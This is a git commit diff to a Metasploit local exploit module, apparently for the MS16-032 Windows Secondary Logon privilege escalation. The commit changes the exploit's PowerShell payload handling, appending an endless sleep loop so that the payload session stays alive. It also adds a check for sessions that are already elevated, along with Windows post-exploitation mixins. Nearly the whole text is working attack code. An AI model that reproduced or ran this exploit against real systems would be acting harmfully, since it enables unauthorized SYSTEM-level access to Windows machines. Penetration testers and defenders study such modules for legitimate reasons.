Fix Payload exit issue
Fixed payload exiting issue by adding while ($true){Start-Sleep 1000}; statement.
This commit is contained in:
parent
40d7de05ef
commit
7211936f96
|
@ -12,7 +12,10 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -83,7 +86,9 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
if is_system?
|
||||
fail_with(Failure::None, 'Session is already elevated')
|
||||
end
|
||||
arch1 = check
|
||||
if arch1 == nil
|
||||
print_error("Architecture could not be determined.")
|
||||
|
@ -95,6 +100,7 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
|||
vprint_status("PS1 loaded from #{ps_path}")
|
||||
ms16_032 = File.read(ps_path)
|
||||
cmdstr=expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
|
||||
|
||||
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
|
||||
cmdstr.gsub!("System32","SYSWOW64")
|
||||
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
|
||||
|
@ -106,7 +112,7 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
|||
payl.sub!(/.*?(?=New-Object IO)/im, "")
|
||||
payl = payl.split("';$s.")[0]
|
||||
payl.gsub!("''","'")
|
||||
payl = "$s=#{payl}"
|
||||
payl = "$s=#{payl}while($true){Start-Sleep 1000};"
|
||||
|
||||
@upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
|
||||
path = datastore['W_PATH'] || pwd
|
||||
|
@ -146,7 +152,6 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
|||
rescue
|
||||
print_error("An error occurred executing the script.")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def cleanup
|
||||
|
@ -161,5 +166,4 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
|||
print_error("There was an issue with cleanup of the powershell payload script.")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue